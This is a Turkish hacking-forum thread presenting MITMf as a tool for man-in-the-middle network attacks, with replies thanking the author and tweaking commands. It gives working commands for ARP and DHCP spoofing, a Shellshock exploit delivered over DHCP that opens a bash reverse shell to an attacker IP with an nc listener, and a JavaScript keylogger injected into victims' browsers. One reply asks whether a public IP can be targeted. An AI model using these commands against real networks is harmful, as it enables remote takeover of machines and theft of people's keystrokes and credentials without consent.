1. Duyuruyu Kapat

MITMf ile Network Saldırıları

'Tools' forumunda exploit tarafından 21 Ocak 2016 tarihinde açılan konu

  1. exploit

    exploit Well-Known Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    0
    MITMF
    MITMf network saldırıları için hazırlanmış olan python ile geliştirimeye devam eden bir frameworktür. En güzel özelliklerinden birisi ise plug-in desteğidir. İhtiyaç dahilinde istediğiniz özellikle bir plug-in yazmanızı mümkün kılmaktadır. Mevcutta var olan plug-in’lerin listesi aşağıdaki şekildedir.

    • Spoof – ARP Spoofig saldırıları ile DNS ve DHCP gibi protokoller üzerin spoofing saldırıları gerçekleştirebilir.
    • BeEFAutorun – Kurbanın işletim sistemi browser tipine göre BeEF modülünü aktifleştirir.
    • AppCachePoison – Uygulama cache zehirleme saldırısı
    • BrowserProfiler – Kurbanın tarayıcısında ki pluginleri tespit eder.
    • CacheKill – Header bilgilerinin değiştirerek sayfanın cache’ini öldürür.
    • FilePwn – bdfactory modülü ile zararlı yazılım saldırısı.
    • Inject – Kurbana gönderilen HTTP içeriğine mudahale eder.
    • JavaPwn – Java versiyonuna göre Java-drive-by saldırısı gerçekleştirir.
    • jskeylogger – Kurbana gönderilen içeriği manipüle edere JS Keylogger saldırısı gerçekleştirir.
    • Replace – Kurbana sunucu tarafından gönderilen içeriğin herhangi bir kısmını değiştirir.
    • Upsidedownternet – HTML içerikleri resimleri 180 derece değiştirir :)
    MITMf Kali üzerine Kurulumu
    MITMf ilk çıktığında herhangi bir installation dökümanı bulunmamaktaydı. Bu konu ile ilgili ufak bir çalışma yapmış bulunmaktayım. Bu yazının yayınlandığı tarihte kurulum adımlarının eklenmesi ile ilgili pull request gönderilmiş bulunmaktadır. ( https://github.com/byt3bl33d3r/MITMf/pull/10 ).

    Kurulum için aşağıdaki komutları sırasıyla çalıştırmanız yeterli olacaktır.
    Kod:
    git clone https://github.com/byt3bl33d3r/MITMf.git mitmf
    ./install-bdfactory.sh
    apt-get install capstone python-nfqueue
    pip install pefile capstone
    MITMf ile İlk Saldırı ve Shellshock

    MITMf default olarak DHCP Spoofing saldırısını desteklemektedir. Bunun yanı sıra Shellshock zafiyetinide kullanabilen modülü aktifleştirilebilmektedir. Eğer gerçek DHCP sunucu ile saldırganın oluşturduğu DHCP sunucusu arasında ki “race condition” kazanılırsa Shellshock zafiyeti exploit edilmiş olacaktır.
    Kod:
    python mitmf.py --spoof --iface wlan0 --dhcp --shellshock
    Hedef sunucuda istenilen komut çalıştırılabildiği için shellshock zafiyetini reverse shell bağlantısı hedefleyerek exploit edeceğiz. Bunu için aşağıdaki komutu çalıştırabilirsiniz.
    Kod:
    python mitmf.py --spoof --iface eth0 --dhcp --shellshock --cmd "/bin/bash -i >& /dev/tcp/172.16.153.128/21 0>&1"
    Gelen bağlantıyı karşılayabilmke için ayrı bir terminalde aşağıda ki komutu çalıştırınız.
    Kod:
    nc -lvp 21
    [​IMG]
    Networkte bulunan herhangi bir linux sunucu dhcp talebinde bulunduğuda ise aşağıdaki gibi bir bekleme olacaktır çünkü shellshock zafiyeti üzerinden saldırganın bilgisayarına bağlantı gerçekleşmiştir.
    [​IMG]

    MITMF JS Keylogger Özelliği
    Kullanıcının html içeriğine müdahile edilebildiği için istenilen JS kodlarıda kurbanların internet tarayıcılarında çalıştırılabilir. JS kodları ile kullanıcının klavyesini dinlemeye imkan veren JSKeylogger özelliğini kullanmak için aşağıdaki komutu çalıştırmak yeterlidir.
    Kod:
    python mitmf.py --spoof --arp --iface eth0 --gateway 172.16.153.2 --target 172.16.153.129 --jskeylogger
    Kurban kişi linux.org adresini girmiştir ve bu sayfa açıkken bastigi tum tuslar kayit altina alınmıştır.

    NOT:Bu saldırının gerçekleştirildiğin networkte bulunan ve aktif olarak çalışan gerçek bir DHCP sunucusu bulunmaktadır. Shellshock zafiyetinin exploit edilmesi içinde DHCP sunucusunun ele geçirilmesi zorunlu değildir !
     
  2. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    489
    Beğeniler:
    12
    Web Sitesi:
    Sağlam Geri Dönüş olmuş Ellerine Sağlık ;)
     
  3. exploit

    exploit Well-Known Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    0
    Eyvallah :)
     
  4. mystrous

    mystrous Member

    Katılım:
    26 Mayıs 2015
    Mesaj:
    14
    Beğeniler:
    0
    teşekkürler dostum.
     
  5. qrdinary

    qrdinary Well-Known Member

    Katılım:
    10 Haziran 2016
    Mesaj:
    330
    Beğeniler:
    0
    Keylogger ozelligi icin bu komutta

    python mitmf.py --spoof --arp --iface eth0 --gateway 172.16.153.2 --target 172.16.153.129 --jskeylogger


    Gateway dan sonra kendi public ipimizi targetten sonra hedefin public ipsinimi yazmamiz gerekiyor
     
  6. MeTaL

    MeTaL Active Member

    Katılım:
    13 Haziran 2016
    Mesaj:
    35
    Beğeniler:
    0
    Cvp: MITMf ile Network Saldırıları

    Bende şuan son version kurulu bu şekilde yazınca kabul etmiyor kodu şu şekilde düzenle

    python mitmf.py -i eth1 --spoof --arp --gateway 192.168.0.1 --target 192.168.0.13 --jskeylogger

    eth1 bendeki sonuç sen onu kendine göre düzenle . ifconfig yazıp eth1 demi ip var eth0 damı ip var onu kontrol et ona göre kodu düzenle. 13 olan saldırıcağın cihaz oluyor.
     

Bu Sayfayı Paylaş

Share